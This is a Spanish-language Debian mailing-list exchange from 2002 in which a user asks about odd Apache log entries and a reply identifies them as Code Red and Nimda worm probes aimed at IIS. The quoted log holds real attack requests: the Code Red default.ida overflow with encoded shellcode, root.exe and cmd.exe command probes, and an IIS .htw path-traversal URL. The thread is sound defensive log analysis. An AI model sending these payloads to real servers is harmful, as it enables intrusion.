Hola bienvenido al mundo de los gusanos, son dos distintos los que te estan "atacando" el nimda y el red code, sin duda esto se debe al nivel que tienen los administradores de IIS despues de 2 a�os aun seguimos teniendo estos problemitas, por lo demas apache no esta afectado por ninguno de estos dos.
Saludos, Roberto On Fri, May 10, 2002 at 05:11:26PM +0200, Aitor wrote: > Hola a todos: > Tengo el apache 1.3.24 instalado desde hace poco (para probarlo) y ayer > mirando el acces.log me encontre con esto: > 218.25.47.223 - - [09/May/2002:01:31:06 +0200] "GET > /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%uc > bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801% > u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" > 400 331 "-" "-" > > y con esto: > > 217.216.124.199 - - [09/May/2002:15:26:26 +0200] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 289 "-" "-" > 217.216.124.199 - - [09/May/2002:15:26:29 +0200] "GET /MSADC/root.exe?/c+dir > HTTP/1.0" 404 287 "-" "-" > 217.216.124.199 - - [09/May/2002:15:26:36 +0200] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-" > > Buscando exploits y eso me encontre con este (aunque solo es de IIS): > > http://ip/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 > %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 > %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 > %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 > %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 > %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiwebhitsFile=/../.. > /./..test.txt&CiRestriction=none&CiHiliteType=Full > > Que mas o menos se parece la pregunta es: �Alguien esta intentado algo > raro?�o es mejor que deje las bebidas de alta graduacion:-)? > Si alguien me pudiera aclarar esto ya digo que tengo el server desde hace > poco y lo puse para probar > > Gracias y perdonad por el posible [OT] y por lo largo del texto :-) > -- > ____________________________________ > * * > * web personal: http://go.to/nuestra.web * > * Linux user #255925 * > * Debian/GNU * > * Kernel 2.2.18 * > *___________________________________* > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
